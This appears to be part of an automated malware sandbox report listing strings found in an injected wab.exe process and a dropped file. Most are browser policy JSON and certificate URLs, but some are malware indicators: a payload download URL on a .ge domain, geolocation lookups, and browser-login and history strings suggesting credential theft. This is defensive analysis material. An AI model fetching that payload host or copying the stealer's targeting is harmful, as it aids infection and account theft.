              Source: wab.exe, 00000009.00000003.49632650714.00000000051C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":
              Source: wab.exe, 00000009.00000003.49632682724.00000000051C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFound
              Source: wab.exe, 00000009.00000003.49632682724.00000000051C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFound
              Source: wab.exe, 00000009.00000003.49631698308.00000000051C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"o
              Source: wab.exe, 00000009.00000003.49631698308.00000000051C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"o
              Source: wab.exe, 00000007.00000002.54485525601.0000000035210000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.54485525601.0000000035210000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.geotrust.com/GeoTrustECCCA2018.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cacerts.thawte.com/ThawteRSACA2018.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cdp.geotrust.com/GeoTrustECCCA2018.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://cdp.thawte.com/ThawteRSACA2018.crl0L
              Source: bhv7197.tmp.9.drString found in binary or memory: http://certificates.godaddy.com/repository/0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://certs.godaddy.com/repository/1301
              Source: bhv7197.tmp.9.drString found in binary or memory: http://contentstorage.osi.office.net/
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl.globalsign.com/gsgccr3dvtlsca2020.crl0#
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl.godaddy.com/gdig2s1-2558.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertSHA2SecureServerCA.crl0=
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0F
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0D
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0L
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0L
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0L
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0L
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
              Source: bhv7197.tmp.9.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp3
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp=
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpR
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn
              Source: wab.exe, 00000007.00000002.54465818643.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000007.00000002.54464219226.0000000000A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.bin
              Source: wab.exe, 00000007.00000002.54465818643.0000000000EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.binVascGiltathirchimie.com/IogvoayYhe139.bin
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe, Tramper.exe.7.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv7197.tmp.9.drString found in binary or memory: http://o.ss2.us/0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0B
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0F
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0G
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0K
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0M
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.globalsign.com/ca/gsovsha2g4r30
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr3dvtlsca20200V
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.godaddy.com/0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.godaddy.com/02
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.godaddy.com/05
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.pki.goog/gts1c301
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.pki.goog/gtsr100
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp.sectigo.com0%
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr30;
              Source: bhv7197.tmp.9.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhv7197.tmp.9.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
